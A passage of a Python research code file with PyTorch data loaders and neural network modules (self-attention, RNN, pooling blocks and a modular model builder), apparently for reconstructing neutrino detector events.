load_data(\n hyper_pars, \n data_pars, \n architecture_pars, \n meta_pars, \n keyword, \n file_list=None, \n drop_last=False, \n debug_mode=False, \n db_path=None\n ):\n\n if db_path == None:\n raise ValueError('A DB path must be supplied!')\n\n data_dir = data_pars['data_dir'] # WHere to load data from\n seq_features = data_pars['seq_feat'] # feature names in sequences (if using LSTM-like network)\n scalar_features = data_pars['scalar_feat'] # feature names\n targets = get_target_keys(data_pars, meta_pars) # target names\n # particle_code = get_particle_code(data_pars['particle'])\n # how much data should be trained on?\n train_frac = data_pars.get('train_frac', None) \n # how much data should be used for validation?\n val_frac = data_pars.get('val_frac', None) \n # how much data should be used for training\n test_frac = data_pars.get('test_frac', None) \n # which cleaning lvl and transform should be applied?\n file_keys = data_pars.get('file_keys', None) \n mask_names = data_pars['masks']\n weights = data_pars.get('weights', 'None')\n dom_mask = data_pars.get('dom_mask', 'SplitInIcePulses')\n max_seq_len = data_pars.get('max_seq_len', np.inf)\n batch_size = hyper_pars.get('batch_size', None)\n # TODO: Ensure robust loading of ensemble\n ensemble = data_pars.get('ensemble', [])\n regression = meta_pars['group']\n \n if keyword == 'train':\n drop_last = True\n batch_size = hyper_pars['batch_size']\n n_events_wanted = data_pars.get('n_train_events_wanted', np.inf)\n elif keyword == 'val':\n batch_size = data_pars['val_batch_size']\n n_events_wanted = data_pars.get('n_val_events_wanted', np.inf)\n elif keyword == 'predict':\n batch_size = data_pars['val_batch_size']\n n_events_wanted = data_pars.get('n_predictions_wanted', np.inf)\n if file_keys:\n prefix = 'transform'+str(file_keys.get('transform', 'None'))+'/'\n if file_keys['transform'] == -1:\n prefix = 'raw/'\n ### Deprecated stuff ###\n # if 
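The two branches in `_get_meta_information` differ only in rounding: training keeps full batches (floor division, so a partial tail batch is dropped), while validation/prediction rounds up so every event is covered. With 10 events and a batch size of 4, for example:

```python
import numpy as np

n_events, batch_size = 10, 4
print(n_events // batch_size)                # 2 -> training sees 8 events
print(int(np.ceil(n_events / batch_size)))   # 3 -> prediction sees all 10
```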
'LstmLoader' == data_pars['dataloader']:\n # dataloader = LstmLoader(data_dir, file_keys, targets, scalar_features, seq_features, keyword, train_frac, val_frac, test_frac)\n # elif 'SeqScalarTargetLoader' == data_pars['dataloader']:\n # prefix = 'transform'+str(file_keys['transform'])+'/'\n # dataloader = SeqScalarTargetLoader(data_dir, seq_features, \n # scalar_features, targets, keyword, train_frac, \n # val_frac, test_frac, prefix=prefix)\n # elif 'FullBatchLoader' == data_pars['dataloader']:\n # dataloader = FullBatchLoader(data_dir, seq_features, scalar_features, \n # targets, keyword, train_frac, val_frac, test_frac,\n # batch_size, prefix=prefix, n_events_wanted=n_events_wanted,\n # particle_code=particle_code, file_list=file_list, \n # mask_name=mask_name, drop_last=drop_last, \n # debug_mode=debug_mode)\n # elif 'PickleLoader' == data_pars['dataloader']:\n # prefix = 'transform'+str(file_keys['transform'])\n # if file_keys['transform'] == -1:\n # prefix = 'raw'\n # dataloader = PickleLoader(data_dir, seq_features, scalar_features, \n # targets, keyword, train_frac, val_frac, \n # test_frac, prefix=prefix, n_events_wanted=n_events_wanted, \n # masks=mask_names, weights=weights,\n # dom_mask=dom_mask, max_seq_len=max_seq_len\n # )\n if 'SqliteLoader' == data_pars['dataloader']:\n dataloader = SqliteLoader(\n data_dir, \n seq_features, \n scalar_features, \n targets, \n masks=mask_names, \n n_events_wanted=n_events_wanted, \n weights=weights, \n dom_mask=dom_mask, \n max_seq_len=max_seq_len, \n keyword=keyword,\n batch_size=batch_size,\n ensemble=ensemble, \n db_path=db_path,\n reg_type=regression\n )\n else:\n raise ValueError('Unknown data loader requested!')\n \n return dataloader\n \ndef load_predictions(data_pars, meta_pars, keyword, file, use_whole_file=False):\n\n cond1 = 'LstmLoader' == data_pars['dataloader']\n cond2 = 'SeqScalarTargetLoader' == data_pars['dataloader']\n cond3 = 'FullBatchLoader' == data_pars['dataloader']\n if cond1 or cond2 or cond3:\n \n seq_features = data_pars['seq_feat'] # feature names in sequences (if using LSTM-like network)\n scalar_features = data_pars['scalar_feat'] # feature names\n targets = get_target_keys(data_pars, meta_pars) # target names\n train_frac = data_pars['train_frac'] # how much data should be trained on?\n val_frac = data_pars['val_frac'] # how much data should be used for validation?\n test_frac = data_pars['test_frac'] # how much data should be used for training\n file_keys = data_pars['file_keys'] # which cleaning lvl and transform should be applied?\n mask_name = data_pars['mask']\n \n if use_whole_file:\n if keyword == 'train':\n train_frac = 1.0\n val_frac = 0.0\n test_frac = 0.0\n elif keyword == 'val':\n train_frac = 0.0\n val_frac = 1.0\n test_frac = 0.0\n elif keyword == 'test':\n train_frac = 0.0\n val_frac = 0.0\n test_frac = 1.0\n\n return LstmPredictLoader(file, file_keys, targets, scalar_features, seq_features, 'val', train_frac, val_frac, test_frac, mask_name=mask_name)\n \n else:\n raise ValueError('An unknown prediction loader was requested!')\n\ndef get_collate_fn(data_pars, mode='normal', permute_seq_features=[], permute_scalar_features=[], from_frac=0.0, to_frac=1.0):\n '''Returns requested collate-function, if the key 'collate_fn' is in the dictionary data_pars.\n '''\n\n if 'collate_fn' in data_pars:\n name = data_pars['collate_fn']\n if name == 'PadSequence':\n func = PadSequence(mode=mode, permute_seq_features=permute_seq_features, permute_scalar_features=permute_scalar_features,\n from_frac=from_frac,\n 
to_frac=to_frac)\n \n else:\n raise ValueError('Unknown collate-function requested!')\n else:\n func = None\n\n return func\n\ndef sort_indices(dataset, data_pars, dataloader_params=None):\n if 'collate_fn' in data_pars:\n collate_fn = data_pars['collate_fn']\n else: \n collate_fn = None\n\n if collate_fn == None:\n indices = dataset.indices\n \n # Since PadSequence sorts each batch wrt the longest sequence, the indices must be sorted aswell!\n elif collate_fn == 'PadSequence':\n batch_size = dataloader_params['batch_size']\n indices = dataset.indices\n n_indices = len(indices)\n\n for key in dataset.seq_features:\n seq = dataset.seq_features[key]\n break\n\n index_seq_pairs = [(indices[i], seq[i]) for i in range(n_indices)]\n \n if batch_size > n_indices:\n end = n_indices\n else:\n end = batch_size\n\n # While a whole batch is extracted, sort per batch\n while end <= n_indices:\n index_seq_pairs[end-batch_size:end] = sorted(index_seq_pairs[end-batch_size:end], key=lambda x: x[1].shape[0], reverse=True)\n \n end += batch_size\n \n # Sort remaining aswell\n index_seq_pairs[end-batch_size:-1] = sorted(index_seq_pairs[end-batch_size:-1], key=lambda x: x[1].shape[0], reverse=True)\n\n indices = [x[0] for x in index_seq_pairs]\n \n else:\n raise ValueError('Unknown sort function requested!')\n\n return indices\n\ndef load_pickle_weights(dataset, weights):\n \"\"\"Small function to load weights for a dataloader.\n \n Arguments:\n dataset {str} -- path to dataset\n weights {str} -- name of weights.\n \n Returns:\n array -- weights\n \"\"\" \n path = get_project_root()+get_path_from_root(dataset)+'/weights/'+weights+'.pickle'\n \n if weights == 'None':\n weights = [1]*get_n_tot_pickles(dataset)\n else:\n with open(path, 'rb') as f:\n weights = pickle.load(f)['weights']\n \n return np.array(weights)\n\ndef load_sqlite_weights(dataset, weights):\n \"\"\"Small function to load weights for a dataloader.\n\n Weights are loaded as a dictionary with event_id as keys and their \n corresponding weight\n \n Arguments:\n dataset {str} -- path to dataset\n weights {str} -- name of weights.\n \n Returns:\n dictionary -- dicitonary with weights for train, val. 
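`sort_indices` exists because `PadSequence` expects every batch to be ordered longest-sequence-first; the sort is therefore applied per batch window rather than globally, so batch membership is preserved. A minimal sketch of that windowed sort, assuming the sequence length of each index is already known:

```python
# Hypothetical (index, sequence_length) pairs.
pairs = [(0, 5), (1, 9), (2, 1), (3, 7), (4, 2), (5, 8)]
batch_size = 3

for start in range(0, len(pairs), batch_size):
    window = pairs[start:start + batch_size]
    pairs[start:start + batch_size] = sorted(
        window, key=lambda p: p[1], reverse=True)

print([idx for idx, _ in pairs])  # [1, 0, 2, 5, 3, 4]
```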
and test-db.\n \"\"\" \n path = '/'.join([PATH_DATA_OSCNEXT, 'weights', weights+'.pickle'])\n \n with open(path, 'rb') as f:\n weights = pickle.load(f)['weights']\n\n return weights\n\n# ======================================================================== \n# MODELS\n# ========================================================================\n\nclass Angle2Unitvector(nn.Module):\n \n def __init__(self):\n super(Angle2Unitvector, self).__init__()\n \n def forward(self, pred, device=None):\n\n # if not device:\n # raise ValueError('A device must be supplied!')\n \n x = torch.unsqueeze(\n torch.sin(pred[:, 0]) * torch.cos(pred[:, 1]), dim=1\n )\n y = torch.unsqueeze(\n torch.sin(pred[:, 0]) * torch.sin(pred[:, 1]), dim=1\n )\n z = torch.unsqueeze(\n torch.cos(pred[:, 0]), dim=1\n )\n \n out = torch.cat((x, y, z), dim=1)\n \n return out\n\nclass AveragePool(nn.Module):\n def __init__(self):\n \n super(AveragePool, self).__init__()\n self._batch_first = True\n # self.device = get_device()\n\n def forward(self, seq, lengths, device=None):\n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # A tensor of shape (batch_size, longest_seq, *) is expected and a list of len = batch_size and lengths[0] = longest_seq\n # Maxpooling is done over the second index\n mask = self._get_mask(lengths, max_length, batch_first=True, device=device)\n # By masking with 0, it is ensured that DOMs that are actually not there do not have an influence on the sum. By dividing with sequence length, we get the true mean\n seq = seq.masked_fill(~mask, 0.0)\n if self._batch_first:\n # (B, L, *) --> (B, *)\n seq = torch.sum(seq, dim=1)\n bs, feats = seq.shape\n # Some view-acrobatics due to broadcasting semantics.\n seq = (seq.view(feats, bs)/lengths).view(bs, feats)\n else:\n raise ValueError('Not sure when batch not first - AveragePool')\n\n return seq\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n # The 'None' is a placeholder so dimensions are matched.\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(2)\n return mask\n\nclass AttentionBlock(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, n_in, n_out, mode=None, intermediate=None):\n \n super(AttentionBlock, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = n_in\n self.n_out = n_out\n if intermediate:\n self._intermediate = intermediate\n else:\n self._intermediate = n_in\n self.n_out = n_out\n self._batch_first = True\n\n if mode == 'encoder':\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n self.V = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n init_weights(arch_dict, arch_dict['nonlin'], self.V)\n elif mode == 
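`Angle2Unitvector` applies the standard spherical-to-Cartesian map, with column 0 as the polar (zenith) angle and column 1 as the azimuth; the result is a unit vector by construction, which makes cosine-type angular losses straightforward. A quick numpy check of the same formulas:

```python
import numpy as np

theta, phi = np.pi / 3, np.pi / 4  # example zenith and azimuth
v = np.array([np.sin(theta) * np.cos(phi),
              np.sin(theta) * np.sin(phi),
              np.cos(theta)])
print(np.linalg.norm(v))  # ~1.0, always, by construction
```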
'decoder':\n raise ValueError('AttentionDecoder: Not implemented yet')\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=1)\n self.V = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n init_weights(arch_dict, arch_dict['nonlin'], self.V)\n\n self.softmax = nn.Softmax(dim=-1)\n if self.layer_dict.get('LayerNorm', False):\n self.norm = nn.LayerNorm(n_out)\n self.linear_out = nn.Linear(in_features=n_out, out_features=n_out)\n self.nonlin = add_non_lin(arch_dict, arch_dict['nonlin'])\n if self.layer_dict.get('LayerNorm', False):\n self.norm2 = nn.LayerNorm(n_out)\n if self.layer_dict.get('Residual', False):\n self.residual_connection = True\n \n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n q = self.Q(seq)\n k = self.K(seq)\n v = self.V(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(q, k, v, lengths, max_length, batch_first=self._batch_first, device=device)\n if self.residual_connection and self.n_in == self.n_out:\n post_attention = seq + post_attention\n if self.norm:\n post_attention = self.norm(post_attention)\n \n # linear layer -> nonlin -> potential norm and residual connection\n output = self.nonlin(self.linear_out(post_attention))\n if self.residual_connection:\n output = output + post_attention\n if self.norm:\n output = self.norm2(output)\n \n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass AttentionBlock2(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'. Uses no value-vectors, but just the sequence itself. 
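All the attention blocks share one masking trick: scores for padded time steps are set to -inf before the softmax, so padding receives exactly zero weight and the real DOMs renormalize among themselves. A stripped-down torch sketch (identity projections instead of learned Q/K/V, batch-first shapes as in the blocks above):

```python
import torch
from math import sqrt

B, L, F = 2, 4, 8
seq = torch.randn(B, L, F)
lengths = torch.tensor([4, 2])             # event 1 has two padded steps

q = k = v = seq                            # identity projections for the sketch
scores = torch.matmul(q, k.transpose(-2, -1)) / sqrt(F)   # (B, L, L)

mask = torch.arange(L)[None, :] < lengths[:, None]         # (B, L)
scores = scores.masked_fill(~mask.unsqueeze(1), float('-inf'))
weights = torch.softmax(scores, dim=-1)

print(weights[1, 0])            # last two weights are exactly 0
out = torch.matmul(weights, v)  # (B, L, F) weighted sums of v
```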
Furthermore, experimenting with only normalizing after nonlinearity.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, n_in, n_out, batch_first=True):\n \n super(AttentionBlock2, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = n_in\n self.n_out = n_out\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=n_in, out_features=n_out)\n self.K = nn.Linear(in_features=n_in, out_features=n_out)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n init_weights(arch_dict, arch_dict['nonlin'], self.K)\n\n self.softmax = nn.Softmax(dim=-1)\n self.linear_out = nn.Linear(in_features=n_out, out_features=n_out)\n self.nonlin = add_non_lin(arch_dict, arch_dict['nonlin'])\n if self.layer_dict.get('LayerNorm', False):\n self.norm = nn.LayerNorm(n_out)\n if self.layer_dict.get('Residual', False):\n self.residual_connection = True\n \n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n q = self.Q(seq)\n k = self.K(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(q, k, seq, lengths, max_length, batch_first=self._batch_first, device=device)\n \n # linear layer -> nonlin -> potential norm and residual connection\n output = self.nonlin(self.linear_out(post_attention))\n if self.residual_connection:\n output = output + post_attention\n if self.norm:\n output = self.norm(output)\n\n return output\n\n def _calc_self_attention(self, q, k, v, lengths, max_length, batch_first=False, device=None):\n # The matrix multiplication is always done with using the last two dimensions, i.e. 
(*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n weights = torch.matmul(q, k.transpose(-2, -1)) / sqrt(self.n_out)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n weights = weights.masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n output = torch.matmul(weights, v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n mask = mask.unsqueeze(1)\n return mask\n\nclass RnnBlock(nn.Module):\n \n def __init__(\n self, \n n_in, \n n_out, \n n_parallel, \n num_layers, \n rnn_type='LSTM', \n bidir=False, \n residual=False, \n batch_first=True, \n learn_init=False, \n dropout=0.0):\n \n super(RnnBlock, self).__init__()\n\n self._batch_first = batch_first\n self.hidden_size = n_out\n self.n_in = n_in\n self.residual = residual\n self.bidir = bidir\n self.n_dirs = 2 if bidir else 1\n self.n_layers = num_layers\n self.learn_init = learn_init\n self.dropout = dropout\n self.rnn_type = rnn_type\n self.par_RNNs = nn.ModuleList()\n if learn_init:\n self.init_hidden_states = nn.ParameterList()\n if rnn_type == 'LSTM':\n self.init_cell_states = nn.ParameterList()\n \n if rnn_type == 'LSTM':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.LSTM(\n input_size=n_in, \n hidden_size=n_out, \n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n self.init_cell_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n\n elif rnn_type == 'GRU':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.GRU(\n input_size=n_in,\n hidden_size=n_out,\n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n # self.init_cell_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n elif rnn_type == 'Vanilla':\n for i_par in range(n_parallel):\n self.par_RNNs.append(\n nn.RNN(\n input_size=n_in,\n hidden_size=n_out,\n bidirectional=bidir, \n num_layers=num_layers, \n batch_first=batch_first, \n dropout=self.dropout,\n )\n )\n if self.learn_init:\n n_parameters = self.n_dirs*self.hidden_size*self.n_layers\n self.init_hidden_states.append(nn.Parameter(torch.empty(n_parameters).normal_(mean=0,std=1.0)))\n \n else:\n raise KeyError('UNKNOWN RNN TYPE (%s) PASSED TO MAKEMODEL'%(rnn_type))\n \n def forward(self, seq, lengths, device=None):\n \n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n longest_seq = seq.shape[1]\n batch_size = seq.shape[0]\n else:\n longest_seq = seq.shape[0]\n batch_size = seq.shape[1]\n\n # Send through LSTMs! Prep for first layer.\n seq_packed = pack(seq, lengths, batch_first=self._batch_first)\n \n # x is output - concatenate outputs of LSTMs in parallel\n for i_par in range(len(self.par_RNNs)):\n \n # Instantiate hidden and cell.\n # ? 
Maybe learn initial state?\n if self.learn_init:\n \n # GRUs and LSTMs require different initiations\n if self.rnn_type == 'LSTM':\n # ? Dont know why, but the .contiguous call is needed, else an error is thrown\n hidden = self.init_hidden_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n cell = self.init_cell_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n h = (hidden, cell)\n elif self.rnn_type in ['GRU', 'Vanilla']:\n h = self.init_hidden_states[i_par].view(self.n_layers*self.n_dirs, 1, -1).expand(-1, batch_size, -1).contiguous()\n\n else:\n h = self.init_hidden(batch_size, self.par_RNNs[i_par], device)\n\n # Send through LSTM\n self.par_RNNs[i_par].flatten_parameters()\n seq_par, h_par = self.par_RNNs[i_par](seq_packed, h)\n seq_par_post, lengths = unpack(seq_par, batch_first=True, total_length=longest_seq)\n\n # when multiple directions and layers, h_out is weird - needs careful treatment\n if self.rnn_type == 'LSTM':\n h_out = h_par[0].view(self.n_layers, self.n_dirs, batch_size, self.hidden_size)\n elif self.rnn_type in ['GRU', 'Vanilla']:\n h_out = h_par.view(self.n_layers, self.n_dirs, batch_size, self.hidden_size)\n \n if self.bidir:\n h_out = torch.cat((h_out[self.n_layers-1, 0, :, :], h_out[self.n_layers-1, 1, :, :]), axis=-1)\n else:\n h_out = h_out[self.n_layers-1, 0, :, :]#torch.cat((, h_out[self.n_layers-1, 1, :, :]), axis=-1)\n\n if self.residual:\n seq_par_post = seq_par_post + seq\n \n # Define x on first parallel LSTM-module\n if i_par == 0:\n x = h_out\n seq_out = seq_par_post\n\n # Now keep cat'ing for each parallel stack\n else:\n x = torch.cat((x, h_out), -1)\n seq_out = torch.cat((seq_out, seq_par_post), -1)\n \n return seq_out, x.squeeze(0)\n \n def init_hidden(self, batch_size, layer, device):\n hidden_size = int(layer.weight_ih_l0.shape[0]/4)\n\n # Initialize hidden and cell states - to either random nums or 0's\n # (num_layers * num_directions, batch, hidden_size)\n if self.rnn_type == 'LSTM':\n output = (torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device), \n torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device))\n elif self.rnn_type == 'GRU':\n output = torch.zeros(self.n_dirs*self.n_layers, batch_size, hidden_size, device=device)\n \n return output\n\nclass MakeModel(nn.Module):\n '''A modular PyTorch model builder\n '''\n\n def __init__(self, arch_dict, device):\n super(MakeModel, self).__init__()\n self.mods = make_model_architecture(arch_dict)\n self.layer_names = get_layer_names(arch_dict)\n self.arch_dict = arch_dict\n self.device = device\n self.count = 0\n\n # Input must be a tuple to be unpacked!\n def forward(self, batch):\n # Get device on each forward-pass to be compatible with training on multiple GPUs. An error is raised if no GPU available --> use except\n # try:\n # device = get_device(torch.cuda.current_device())\n # except AssertionError:\n # device = None\n\n # For linear layers\n if len(batch) == 1: \n x, = batch\n\n # For RNNs with additional scalar values\n if len(batch) == 3: \n seq, lengths, scalars = batch\n add_scalars = True \n batch_size = seq.shape[0]\n longest_seq = seq.shape[1]\n # 'Reshape' input (batch first), torch wants a certain form..\n # seq = seq.view(batch_size, -1, n_seq_vars)\n \n # Get device on each forward-pass to be compatible with training on multiple GPUs. 
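The learned initial state is kept as one flat parameter per parallel RNN and reshaped on every forward pass: `view` restores (layers*directions, 1, hidden), `expand` broadcasts it across the batch, and `.contiguous()` is needed because cuDNN rejects the non-contiguous view that `expand` returns. In isolation:

```python
import torch
import torch.nn as nn

n_layers, n_dirs, hidden, batch = 2, 2, 8, 5
init = nn.Parameter(
    torch.empty(n_layers * n_dirs * hidden).normal_(mean=0, std=1.0))

h0 = init.view(n_layers * n_dirs, 1, -1).expand(-1, batch, -1).contiguous()
print(h0.shape)  # torch.Size([4, 5, 8]) -- (layers*dirs, batch, hidden)
```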
An error is raised if no GPU available --> use excep\n device = 'cuda:'+str(seq.get_device())\n\n for layer_name, entry in zip(self.layer_names, self.mods):\n # Handle different layers in different ways! \n if layer_name == 'Linear':\n\n # If scalar variables are supplied for concatenation, do it! \n # But make sure to only do it once.\n if 'scalars' in locals(): \n if add_scalars: \n try:\n x, add_scalars = self.concat_scalars(x, scalars)\n # If x undefined, it means no sequential layers are in the model\n except UnboundLocalError:\n x = scalars\n add_scalars = False\n \n # Send through layers!\n x = entry(x)\n \n elif layer_name == 'Linear_embedder':\n seq = entry(seq)\n \n elif layer_name == 'AttentionEncoder':\n seq = entry(seq, lengths, device=device)\n \n elif layer_name == 'AttentionDecoder':\n x = entry(seq, lengths, device=device)\n \n # AttentionBlock2 is seq2seq\n elif layer_name == 'AttentionBlock2':\n seq = entry(seq, lengths, device=device)\n \n # Many to one! Therefore outputs x\n elif layer_name == 'ManyToOneAttention':\n x = entry(seq, lengths, device=device)\n # The MaxPool-layer is used after sequences have been treated \n # -> prepare for linear decoding.\n elif layer_name == 'MaxPool':\n x = entry(seq, lengths, device=device)\n \n # Same goes for average pool.\n elif layer_name == 'AveragePool':\n x = entry(seq, lengths, device=device)\n \n elif layer_name == 'LstmBlock':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'RnnBlock':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'BiLSTM':\n seq, x = entry(seq, lengths, device=device)\n \n elif layer_name == 'ResBlock':\n # If scalar variables are supplied for concatenation, do it! \n # But make sure to only do it once.\n if 'scalars' in locals(): \n if add_scalars: \n try:\n x, add_scalars = self.concat_scalars(x, scalars)\n # If x undefined, it means no sequential layers are in the model\n except UnboundLocalError:\n x = scalars\n add_scalars = False\n\n x = entry(x)\n \n elif layer_name == 'ResAttention':\n seq = entry(seq, lengths, device=device)\n \n elif layer_name == 'ResBlockSeq':\n seq = entry(seq)\n \n elif layer_name == 'Angle2Unitvector':\n x = entry(x, device=device)\n \n elif layer_name == 'SoftPlusSigma':\n x = entry(x, device=device)\n\n elif layer_name == 'Tanh':\n x = entry(x, device=device)\n\n else:\n raise ValueError('An unknown Module (%s) could not be processed.'%(layer_name))\n\n return x\n\n def init_hidden(self, batch_size, layer, device):\n hidden_size = int(layer.weight_ih_l0.shape[0]/4)\n if layer.bidirectional: num_dir = 2\n else: num_dir = 1\n\n # Initialize hidden and cell states - to either random nums or 0's\n # (num_layers * num_directions, batch, hidden_size)\n return (torch.zeros(num_dir, batch_size, hidden_size, device=device),\n torch.zeros(num_dir, batch_size, hidden_size, device=device))\n # return (torch.randn(num_dir, batch_size, hidden_size, device=device),\n # torch.randn(num_dir, batch_size, hidden_size, device=device))\n \n def concat_scalars(self, x, scalars):\n # x and scalars must be of shape (batch, features)\n return torch.cat((x, scalars), 1), False\n\nclass ManyToOneAttention(nn.Module):\n \"\"\"Implementation of Self Attention almost as described in 'Attention is All You Need'.\n \n (or https://jalammar.github.io/illustrated-transformer/) - calculates query-, key- and valuevectors, softmaxes a padded sequence and scales the dotproducts and returns weighted sum of values vectors.\n \n Can work both as a seq2seq encoder or as 
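`concat_scalars` is the single point where the pooled sequence summary and the per-event scalar features meet: a plain concatenation along the feature axis, done exactly once per forward pass (hence the returned `False` flag). Shape-wise:

```python
import torch

x = torch.randn(4, 16)        # pooled sequence features (batch, feats)
scalars = torch.randn(4, 3)   # per-event scalar features
print(torch.cat((x, scalars), 1).shape)  # torch.Size([4, 19])
```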
a seq2vec decoder - in this case, the key-matrix produces one key only.\n Returns:\n nn.Module -- A Self-attention layer \n \"\"\"\n def __init__(self, arch_dict, layer_dict, batch_first=True):\n \n super(ManyToOneAttention, self).__init__()\n self.arch_dict = arch_dict\n self.layer_dict = layer_dict\n self.n_in = layer_dict['n_in']\n self._batch_first = batch_first\n\n self.Q = nn.Linear(in_features=self.n_in, out_features=self.n_in)\n # We will only have one keyvector - this is the one we want to learn.\n # Instantiate with normally distributed numbers. The dotproduct of 2 vectors of dim N with normally distributed numbers will have a mean of 0 and variance of N. \n self.k = nn.Parameter(torch.empty(self.n_in).normal_(mean=0,std=1.0), requires_grad=True)\n init_weights(arch_dict, arch_dict['nonlin'], self.Q)\n\n self.softmax = nn.Softmax(dim=-1)\n \n \n def forward(self, seq, lengths, device=None):\n # The max length is retrieved this way such that dataparallel works\n if self._batch_first:\n max_length = seq.shape[1]\n else:\n max_length = seq.shape[0]\n\n # TODO: Make Q a nonlinear function i.e. some layers. \n q = self.Q(seq)\n \n # Attention -> potential norm and residual connection\n post_attention = self._calc_self_attention(\n q, \n seq, \n lengths, \n max_length, \n batch_first=self._batch_first, \n device=device\n )\n \n return post_attention.squeeze(1)\n\n def _calc_self_attention(self, q, v, lengths, max_length, batch_first=False, device=None):\n \n # The matrix multiplication is always done with using the last two dimensions, i.e. (*, 10, 11).(*, 11, 7) = (*, 10, 7) \n # The transpose means swap second to last and last dimension\n # masked_fill_ is in-place, masked_fill creates a new tensor\n \n # q: (B, L, F). k: (F, 1)\n weights = torch.matmul(q, self.k.view(self.n_in, -1)) / sqrt(self.n_in)\n mask = self._get_mask(lengths, max_length, batch_first=batch_first, device=device)\n \n # weights: (B, L, 1)\n weights = weights.squeeze(-1).masked_fill(~mask, float('-inf'))\n weights = self.softmax(weights)\n \n # Calculate weighted sum of v-vectors.\n shape = weights.shape\n # output becomes: (B, 1, F)\n output = torch.matmul(weights.view(shape[0], -1, shape[1]), v)\n \n return output\n\n def _get_mask(self, lengths, maxlen, batch_first=False, device=None):\n \n # Assumes mask.size[S, B, *] or mask.size[B, S, *]\n if batch_first:\n mask = torch.arange(maxlen, device=device)[None, :] < lengths[:, None]\n\n return mask\n\nclass MaxPool(nn.Module):\n def __init__(self):\n \n super(MaxPool, self).__init__()\n self._batch_first = True\n # self.device = get_device()\n\n def forward(self, seq, lengths, device=None):\n 